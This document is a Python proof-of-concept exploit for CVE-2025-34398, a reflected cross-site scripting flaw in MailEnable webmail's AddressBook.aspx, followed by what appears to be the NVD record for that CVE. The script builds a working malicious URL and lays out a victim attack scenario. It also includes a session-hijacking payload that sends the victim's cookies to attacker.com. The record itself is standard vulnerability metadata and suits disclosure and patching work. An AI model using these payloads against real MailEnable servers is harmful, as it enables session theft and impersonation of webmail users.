CVE-2025-34398

import urllib.parse # CVE-2025-34398 PoC - MailEnable Reflected XSS in AddressesBcc Parameter # Target: MailEnable < 10.54 # Attack Vector: Reflected XSS via AddressesBcc parameter in AddressBook.aspx target_url = "http://target-server/Mondo/lang/sys/Forms/AddressBook.aspx" # Malicious payload that terminates LoadCurAddresses(), injects arbitrary JS, and comments out remaining code # Payload: ';alert(document.cookie);var a=' payload = "';alert(document.cookie);var a='" encoded_payload = urllib.parse.quote(payload) # Construct malicious URL malicious_url = f"{target_url}?AddressesBcc={encoded_payload}" print("[+] CVE-2025-34398 Reflected XSS PoC") print(f"[+] Target: {target_url}") print(f"[+] Malicious URL:") print(malicious_url) print("\n[+] Attack Scenario:") print("1. Attacker crafts a malicious URL with XSS payload in AddressesBcc parameter") print("2. Victim clicks the link while logged into MailEnable webmail") print("3. Payload is reflected in JavaScript variable 'var sAddrBcc'") print("4. Malicious JavaScript executes in victim's browser") print("5. Attacker steals session cookies or performs actions as the victim") # Alternative payload for session hijacking session_hijack_payload = "';var img=new Image();img.src='http://attacker.com/log?c='+document.cookie;var a='" print(f"\n[+] Session Hijacking Payload:") print(urllib.parse.quote(session_hijack_payload))

{"cve": {"id": "CVE-2025-34398", "sourceIdentifier": "[email protected]", "published": "2025-12-09T18:15:50.070", "lastModified": "2025-12-09T21:38:31.983", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "MailEnable versions prior to 10.54 contain a reflected cross-site scripting (XSS) vulnerability in the AddressesBcc parameter of /Mondo/lang/sys/Forms/AddressBook.aspx. The AddressesBcc value is not properly sanitized when processed via a GET request and is reflected within a <script> block in the JavaScript variable var sAddrBcc. By supplying a crafted payload that terminates the existing LoadCurAddresses() function, inserts attacker-controlled script, and comments out remaining code, a remote attacker can execute arbitrary JavaScript in a victim’s browser when the victim attempts to send an email. Successful exploitation can redirect victims to malicious sites, steal non-HttpOnly cookies, and perform actions as the authenticated user."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mailenable:mailenable:*:*:*:*:standard:*:*:*", "versionEndExcluding": "10.54", "matchCriteriaId": "E4DAB799-EDB6-48D7-A7FD-77D9910CB308"}]}]}], "references": [{"url": "https://mailenable.com/Standard-ReleaseNotes.txt", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://www.mailenable.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/mailenable-reflected-xss-in-addressesbcc-parameter-of-addressbook-aspx", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}